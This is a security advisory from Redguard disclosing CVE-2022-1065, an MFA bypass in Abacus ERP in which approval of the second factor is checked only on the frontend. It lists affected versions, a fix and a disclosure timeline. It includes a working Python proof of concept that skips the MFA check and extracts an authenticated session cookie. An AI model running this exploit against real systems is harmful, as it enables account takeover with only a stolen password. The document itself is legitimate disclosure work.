Security Advisory: MFA Bypass in various versions of Abacus (CVE-2022-1065)
--------------------------------------------------------------------------------

1. Summary
-----------
Abacus  is  an  owner-managed  Swiss software company that  employs  around  600
people.  For over  three decades it has developed  successful business  software
[1].

This advisory describes a vulnerability affecting various versions of the Abacus
ERP  software.  The  vulnerability relies within the authentication  process  of
Abacus and allows to bypass the second factor. Therefore, it is possible to gain
access  to  the  system  with  the knowledge of  a  valid  username  /  password
combination only and weakening the overall security level [2].

2. Vulnerable versions
-----------------------

The attack has been successfully tested against the following version:

* v2021 prior to R4 of 2022-01-15
* v2020 prior to R6 of 2022-01-15

According to vendor information, the following versions are vulnerable as well:

* v2022 prior to R1 of 2022-01-15
* v2021 prior to R4 of 2022-01-15
* v2020 prior to R6 of 2022-01-15
* v2019 after R5 of 2022-03-15 (service pack)
* v2018 after R7 of 2022-04-15 (service pack)

2.1 Versions not vulnerable
----------------------------
According to vendor information, the following versions are not vulnerable:

* v2019 prior to R5 of 2020-03-15
* v2018 prior to R7 of 2020-04-15
* v2017 and prior versions

3. Details
-----------
The application supports multi factor authentication (MFA) to further strengthen
the  authentication process. After a user enters valid credentials, a request is
sent  to the registered Abacus Access app on the mobile device of the user.  The
user  then has to approve  the login request before a redirect to the system  is
performed.  However, the verification request which the user has accepted on the
mobile phone is only validated on the frontend and not the backend. Due to that,
this step can be bypassed by just ignoring the validation.

The following steps are passed during the authentication process:
1. The user accesses the page '/portal/myabacus'
2. The server creates a new session cookie and automatically redirects the user
   to '/oauth/oauth2/v1/auth'
3. The user enters valid credentials, which are sent to
   '/oauth/oauth2/v1/authenticate'
4. If the credentials are valid, the backend system triggers the MFA request to
   the mobile application
5. Until the user has accepted the MFA request on the mobile, the frontend part
   of the application sends a regular status requests to the backend system to
   check if the user has already confirmed the request
6. Once the MFA request has been confirmed and the backend sends a successful
   response in the status request, the authenticated session is bound using a
   request to '/oauth-/oauth2/v1/authenticate/ocra/auth-session-bindings'


However,  in the vulnerable versions,  step 5 is only validated on the  frontend
and  not on the  backend. As such, an attacker can  just bypass/omit the  status
request  and directly initiate  the session binding from step 6 without  further
verification of the MFA status on the backend.

Using this approach, it is possible to initiate a fully authenticated session by
only  providing  username  /  password  without  the  need  to  enter  a  second
authentication factor.

3.1 Proof of Concept
---------------------
The  following proof of  concept generates the necessary requests to generate  a
valid session id.

```python
import re
import json
import urllib

from urllib.request import HTTPCookieProcessor, Request, build_opener

cookie_processor = HTTPCookieProcessor()
opener = build_opener(cookie_processor)

# Step 1,2 - Generate Session ID
opener.open(Request(BASE_URL + "/portal/myabacus"))

# Step 3 - Perform login and extract values
data = urllib.parse.urlencode(
  {'username':USERNAME,'password':PASSWORD}).encode()
req = Request(BASE_URL + "/oauth/oauth2/v1/authenticate", data=data)
res = opener.open(req)
raw = str(res.read())

data_auth = re.search('(?<=data-access-token=")[^"]+', raw).group(0)
data_sid = re.search('(?<=data-auth-session-id=")[^"]+', raw).group(0)
data_rid = re.search('(?<=data-approval-request-id=")[^"]+', raw).group(0)

# Step 6 - Bind auth session to session id without requesting MFA status
data = json.dumps(
  {'authenticationSessionId':data_sid,'approvalRequestId':data_rid}
).encode('utf-8')
req = Request(BASE_URL +
  "/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings")
req.add_header('Authorization', 'Bearer ' + data_auth)
req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', len(data))
opener.open(req,data=data)

# Do manual redirect in case there is no auto redirect
# This step could be omitted depending on the system configuration
data_code = re.search('(?<=code" value=")[^"]+', raw).group(0)
data_sstate = re.search('(?<=session_state" value=")[^"]+', raw).group(0)
data_state = re.search('(?<="state" value=")[^"]+', raw).group(0)

data = urllib.parse.urlencode(
  {'code':data_code,'session_state':data_sstate,'state':data_state}).encode()
req = Request(BASE_URL + "/portal/myabacus/oauthcb",data=data)
opener.open(req)

# Extract cookie
print("__Secure-MYABACUS_SESSION: " +
  cookie_processor.cookiejar
    ._cookies[DOMAIN]['/portal/myabacus']['__Secure-MYABACUS_SESSION'].value)
```

3.2 Workaround / Fix
---------------------
Install  the available hot fixes and / or service packs from 2022-01-15 or newer
[3].

4. Credits
-----------
* Roman Gribi, Redguard AG

5. Timeline
------------
* 2021-12-21 : Initial notification of the vendor.
* 2021-12-29 : Communication of the vulnerability to the vendor.
* 2022-01-03 : Vendor  confirmed  the vulnerability and  announced a fix will be
               released.
* 2022-01-06 : Redguard tested/validated the fix on a test system.
* 2022-01-15 : Fix released to the public by Abacus Research AG.
* 2022-03-24 : Initial contact with NCSC as CNA of Switzerland to assign a CVE.
* 2022-03-24 : CVE-2022-1065 assigned by NCSC [4].
* 2022-04-15 : Public disclosure of this advisory.

6. About Redguard
------------------
Redguard  is a Swiss-based  information security company. We assist our  clients
with  technical security testing  as well as organizational security audits  and
consulting.  This enables us to have a team with extensive experience in a  wide
variety of security relevant topics.

https://www.redguard.ch
contact@redguard.ch

7. Disclaimer
--------------
This  document is not meant to be a complete list of security issues for any  of
the  mentioned software and/or  versions. It is possible and indeed likely  that
there are further security issues that are yet to be identified. The information
in  the advisory is believed  to be accurate at the time of publishing based  on
currently  available information. Use of the information constitutes  acceptance
for  use  in  an  AS  IS  condition. There  are  no  warranties  regarding  this
information.  Neither the author nor the publisher accepts any liability for any
direct,  indirect,  or  consequential  loss or damage arising from  use  of,  or
reliance on, this information.

References
[1] https://www.abacus.ch/unternehmen/portrait
[2] https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication
[3] https://classic.abacus.ch/downloads-page/servicepacks
[4] https://www.cve.org/CVERecord?id=CVE-2022-1065